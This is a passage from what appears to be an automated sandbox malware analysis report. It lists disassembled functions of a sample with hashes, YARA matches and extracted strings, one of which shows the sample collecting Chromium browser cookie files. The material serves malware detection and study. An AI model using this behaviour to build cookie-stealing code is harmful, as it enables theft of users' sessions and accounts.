                                                            • Instruction Fuzzy Hash: 414176716083918BC328CF04C0A47ABB3F1FF86314F915A1CE89A4B790E7B99815CB86
                                                            Function 021675BA Relevance: 4.9, Strings: 3, Instructions: 1198COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2PBb$Yceh$]hW9
                                                            • API String ID: 0-1551782443
                                                            • Opcode ID: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                            • Instruction ID: ae1bbed1871c61ef7b6723eed554c7a48c6f4d4f207e295816a900d6c4d555ee
                                                            • Opcode Fuzzy Hash: 734dabc05ea60f004194020b556aab606ea901bc42e275c09313137895361325
                                                            • Instruction Fuzzy Hash: 57925C70145B808EE726CF35C4A47E7BBE1BF16309F48499CD1EB8B286DB79610ACB51
                                                            Function 00425CEE Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: 7452$7452$JlRp
                                                            • API String ID: 2994545307-3284767125
                                                            • Opcode ID: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                            • Instruction ID: e650c655e12bce7b67b4aee498b20d7031e1d261d0f6e781b1df18e503fb0051
                                                            • Opcode Fuzzy Hash: 92cc4ae05945aba4e668405ce1423f3846cc19dc5b7ecfea896f74c89be008a8
                                                            • Instruction Fuzzy Hash: 5F52AC70205B908BE325CF29D5907A3BBE2BF56304F948A5EC4DB8B785C739B409CB59
                                                            Function 02165F55 Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$7452$JlRp
                                                            • API String ID: 0-3284767125
                                                            • Opcode ID: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                            • Instruction ID: 1c365ce542a98e910d5a7a068c863042aa94d85120631582a94f81d7d2d6060c
                                                            • Opcode Fuzzy Hash: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
                                                            • Instruction Fuzzy Hash: 8352BF70244B818FD339CF29C4A47AABBE6BF56304F548A1DC4EB8B685C779B019CB50
                                                            Function 0043B050 Relevance: 4.1, Strings: 3, Instructions: 343COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"$R-,T$R-,T
                                                            • API String ID: 0-1082949730
                                                            • Opcode ID: 7a4f43ee0880b98fbdcda669b16d56030fa70b8b446607e2e012461912b396b9
                                                            • Instruction ID: 9bdbef18e09c284a1484a8fdec6c79e1bfd0a8a4d41465c41f0146dce1d37148
                                                            • Opcode Fuzzy Hash: 7a4f43ee0880b98fbdcda669b16d56030fa70b8b446607e2e012461912b396b9
                                                            • Instruction Fuzzy Hash: 19B1BD75A083118BC724CF18C49076BB7E2FF88354F19866DE9995B391DB38EC11CB9A
                                                            Function 0217B2B7 Relevance: 4.1, Strings: 3, Instructions: 343COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"$R-,T$R-,T
                                                            • API String ID: 0-1082949730
                                                            • Opcode ID: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                            • Instruction ID: 134f07a4527de0f660dd3a92bf2cff682b62dd5ea84161d41b94e5d7968155c5
                                                            • Opcode Fuzzy Hash: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
                                                            • Instruction Fuzzy Hash: E3B18A75A483118BC714CF18C490A6BB7F2FFC8758F198A2CE89A5B361DB35E911CB91
                                                            Function 0214092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$GetProcAddress.$l
                                                            • API String ID: 0-2784972518
                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction ID: 73dd17916704013b6aa2fadb5f32d60aef856f906f372de50ee15ae35a68fbe6
                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction Fuzzy Hash: 6F316CB6910609DFDB14CF99C880AAEBBF5FF48324F15404AD549A7310D771EA45CFA4
                                                            Function 00405440 Relevance: 3.4, Strings: 2, Instructions: 858COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$8
                                                            • API String ID: 0-46163386
                                                            • Opcode ID: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                            • Instruction ID: dc0667dd8dba82da45780d667ad4d2091edccb94f5c689a9349702639bf5c4e6
                                                            • Opcode Fuzzy Hash: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
                                                            • Instruction Fuzzy Hash: CF8213716087419FD720CF28C884B9BBBE1EF88314F44892EE989A7391D379D954CF96
                                                            Function 021456A7 Relevance: 3.4, Strings: 2, Instructions: 858COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$8
                                                            • API String ID: 0-46163386
                                                            • Opcode ID: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                            • Instruction ID: f3e84096eef13e8d037aed489c9d476cfdea19ad0be2cf29108fd30c78acee16
                                                            • Opcode Fuzzy Hash: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
                                                            • Instruction Fuzzy Hash: 58827971608341AFD720CF18C890B5ABBE2BF98318F48892DF99987391DB75D954CF92
                                                            Function 00424B80 Relevance: 3.1, Strings: 2, Instructions: 561COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$"
                                                            • API String ID: 0-3758156766
                                                            • Opcode ID: 39a36143f8f53ad1dc47c3b50122958e84c0c18b91b285685412c9f6e20ff32b
                                                            • Instruction ID: 4536deac87be68b66e6b1169164205a16b20366d1629798eb3173c915dafa2c3
                                                            • Opcode Fuzzy Hash: 39a36143f8f53ad1dc47c3b50122958e84c0c18b91b285685412c9f6e20ff32b
                                                            • Instruction Fuzzy Hash: 2502F371B083249BD714CE29E89076BB7D5ABC4314F998A6EE8958B381D738DD048B86
                                                            Function 00426174 Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                            • Instruction ID: 26763a119934df737aef44f96d102629e4e06364a32b506b5a4d198ec9095851
                                                            • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                            • Instruction Fuzzy Hash: C0F19E70205B508FE329CF25D0A43A3BBE1BF56304F95896EC4EB8B785C739A449CB55
                                                            Function 021663DB Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                            • Instruction ID: 7b452434a6981daf3897cf41d5a8b3d7af6e106c371cdce4e3df3c115ab245c1
                                                            • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                            • Instruction Fuzzy Hash: D5F16CB0244B818FE3398F29C0A47A7BBE5BF56304F44896DC4EB8B685C779B019CB51
                                                            Function 00426284 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                            • Instruction ID: 3e43ac3292e75d8b218afd9fd32b7d1e5bc91179cd9b43390289dad712848b02
                                                            • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                            • Instruction Fuzzy Hash: 02F19E70205B508FE329CF25D0A43A3BBE1BF56304F94896EC4EB8B785CB79A449CB55
                                                            Function 021664EB Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                            • Instruction ID: 8b2dec866649cd4fd330bcebb006a227b99ea0cb39f79a003b935dfea1acb409
                                                            • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                            • Instruction Fuzzy Hash: 03F16CB0645B818FE3398F29C0A47A7BBE5BB56304F04896DC4EB8B685C779B019CB51
                                                            Function 02144BD7 Relevance: 2.9, Strings: 2, Instructions: 408COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )$IEND
                                                            • API String ID: 0-707183367
                                                            • Opcode ID: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                            • Instruction ID: 7d6f994e86c893c8d5b35c13d59a12a43c5031c3a3cdf510de2e55d81d201c86
                                                            • Opcode Fuzzy Hash: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                            • Instruction Fuzzy Hash: B4E1F1B2A483449FD714CF28CC9075EBBE1AF94304F15892DF9999B381DB79E904CB92
                                                            Function 00426271 Relevance: 2.9, Strings: 2, Instructions: 393COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                            • Instruction ID: 2c0b636c8f7a7c10555f0b16b025c9559032f4b9242e28262834d6f33c4e1acb
                                                            • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                            • Instruction Fuzzy Hash: 63D19E70205BA08FE325CF24D0A47A3BBE2BF56304F99495DC4EB8B385CB796449CB59
                                                            Function 021664D8 Relevance: 2.9, Strings: 2, Instructions: 393COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                            • Instruction ID: 093d3bfd411642ac0d49dc15686aa434413e59a475647d27f914d66f0f35c602
                                                            • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                            • Instruction Fuzzy Hash: 4FD18EB0245B818FE3298F25C0A87B7BBE6BF56308F48895DC4EB4B685C7797019CB51
                                                            Function 02160AE7 Relevance: 2.9, Strings: 2, Instructions: 390COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ]hiX$gdeb
                                                            • API String ID: 0-4273025081
                                                            • Opcode ID: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
                                                            • Instruction ID: c2edc6eb81f99fa36f4b369b61a29aa3029008cd3b535e0a58ce780a6f5d4ec0
                                                            • Opcode Fuzzy Hash: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
                                                            • Instruction Fuzzy Hash: 93C1B0B16483418FD314CF18C89476FB7E2FB89318F198A6DE89587380E776D955CB82
                                                            Function 00433D0A Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb$gdeb
                                                            • API String ID: 0-1883251077
                                                            • Opcode ID: 041203bfd2295846363c137b8e628af04ec4977896f6b42554eef81a3ecd3aa8
                                                            • Instruction ID: cf9f2457e42b5478319b54834123ade71b3d153c6120c0fe94c03a58d741c5db
                                                            • Opcode Fuzzy Hash: 041203bfd2295846363c137b8e628af04ec4977896f6b42554eef81a3ecd3aa8
                                                            • Instruction Fuzzy Hash: F1513678200B018FD724CF1AC490B27B7E1BB49319F14AA2DD59B8BB62C738F945DB58
                                                            Function 00423AD0 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb$gdeb
                                                            • API String ID: 0-1883251077
                                                            • Opcode ID: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
                                                            • Instruction ID: e92ea4fe5443a7465b3ee846efb2000115bf1a6242ab2642b3cbd9abe9ffc45f
                                                            • Opcode Fuzzy Hash: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
                                                            • Instruction Fuzzy Hash: B531E274211B408BD328CF24C5A4727B7F2BF86706F945A1DC4930BF95C778BA469B84
                                                            Function 00435EB0 Relevance: 1.9, Strings: 1, Instructions: 607COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            • Opcode ID: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
                                                            • Instruction ID: 55aad70b625533d885964fe9cb24da3c7b8194ed29cb22960a26a8a6f416ebd2
                                                            • Opcode Fuzzy Hash: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
                                                            • Instruction Fuzzy Hash: C722B1716083119FD714CF18C890B2BFBE1BB89318F198A2EE8D597391C779D905CB9A
                                                            Function 02176117 Relevance: 1.9, Strings: 1, Instructions: 607COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            • Opcode ID: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
                                                            • Instruction ID: 87aaa0df15eeba67399ac28775d5075b6facd9278ae1a8c3cf56e04d0c664600
                                                            • Opcode Fuzzy Hash: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
                                                            • Instruction Fuzzy Hash: FF22CEB16487918FD714CF18C890B2BBBF5BBC9318F188A2CE9D49B291C775D905CB92
                                                            Function 02141267 Relevance: 1.8, Strings: 1, Instructions: 519COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
                                                            • Instruction ID: b6c6c36d49f227cd4cf2d877dfdec90afeda01149c1b31869bb9c118833cbe28
                                                            • Opcode Fuzzy Hash: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
                                                            • Instruction Fuzzy Hash: 53121971948385ABDB18CE18C4A13AB7FE2AB91314F08856DE8DD4B3D1DB79C5C5C782
                                                            Function 02156B56 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: IO
                                                            • API String ID: 0-3981347273
                                                            • Opcode ID: 29857a2e6ba312719b12aca525c2d64ea56232d1874467d3cf7a2838fadab8ac
                                                            • Instruction ID: 13a3f32624fd5b4595b676fbfff232cae1912c3a118501d1e85784cb171a8bcb
                                                            • Opcode Fuzzy Hash: 29857a2e6ba312719b12aca525c2d64ea56232d1874467d3cf7a2838fadab8ac
                                                            • Instruction Fuzzy Hash: 0AD112B1600A018FD724CF15C590B12BBF2FF49704F148A9CD8AA8FB56D779E885CB94
                                                            Function 004164D2 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 004167B3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
                                                            • API String ID: 0-3705423304
                                                            • Opcode ID: 1a7cb89f16a8d5a4328fc40f41a34d78c1a1ad62b83e42df0e34b4725036604c
                                                            • Instruction ID: e2aff65f3d6dc5062d0ba04aa46064ddba6db07fd0ccc2038df325f36c3021e5
                                                            • Opcode Fuzzy Hash: 1a7cb89f16a8d5a4328fc40f41a34d78c1a1ad62b83e42df0e34b4725036604c
                                                            • Instruction Fuzzy Hash: 9EA18C706057418FD725CF28C1907A3BBE2BF66304F19869DC4964F796D33AE886CB98
                                                            Function 02156739 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 02156A1A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
                                                            • API String ID: 0-3705423304
                                                            • Opcode ID: 105a720d72f04f834a1a897ec32c32aca9f0bc3984781b074275f1dabd6e4c17
                                                            • Instruction ID: 76250dfe8f3350489e7e1ec9c4187cc73e05ee6b7735af849b77470d84adbbdb
                                                            • Opcode Fuzzy Hash: 105a720d72f04f834a1a897ec32c32aca9f0bc3984781b074275f1dabd6e4c17
                                                            • Instruction Fuzzy Hash: A3A1AFB0645791CFD725CF28C490762BBE2BF56304F58869CC8A64F796C336E846CB90
                                                            Function 0043AD30 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            • Opcode ID: f44e3036523da0b72d26407a98b8412ca7f39c6c3557597764c123b35b5b7326
                                                            • Instruction ID: b21458e9d172f3a465188df86c848c015b63d16b5f46d67e3e5fb2f613f60a17
                                                            • Opcode Fuzzy Hash: f44e3036523da0b72d26407a98b8412ca7f39c6c3557597764c123b35b5b7326
                                                            • Instruction Fuzzy Hash: 8391DF746053029BDB28CF19C890B6BB7E2FF88754F18951DE8858B790D738EC61CB96
                                                            Function 0217AF97 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            • Opcode ID: debb42a6f6851ee8560725dc3146cc254c2763f71b95a5a01438313c09bd99f7
                                                            • Instruction ID: 0a9ce9c664c590a8de2c66a673c0e2dfa198decb65faaefc02ce27f8e691dfea
                                                            • Opcode Fuzzy Hash: debb42a6f6851ee8560725dc3146cc254c2763f71b95a5a01438313c09bd99f7
                                                            • Instruction Fuzzy Hash: BB918B756093029BDB18CF18D890B6BB7F2FFC4758F19891CE8858B254DB35EA11CB92
                                                            Function 004067B0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,
                                                            • API String ID: 0-3772416878
                                                            • Opcode ID: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                                                            • Instruction ID: 49ac68bff1f266d30a48b1e8e6a747f7736882c678fe7bbee82a01b3dca97335
                                                            • Opcode Fuzzy Hash: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                                                            • Instruction Fuzzy Hash: 92B139715093819FD314DF68C84465BBBE0AFA9304F448A6EF49997382C375EA28CB96
                                                            Function 02146A17 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
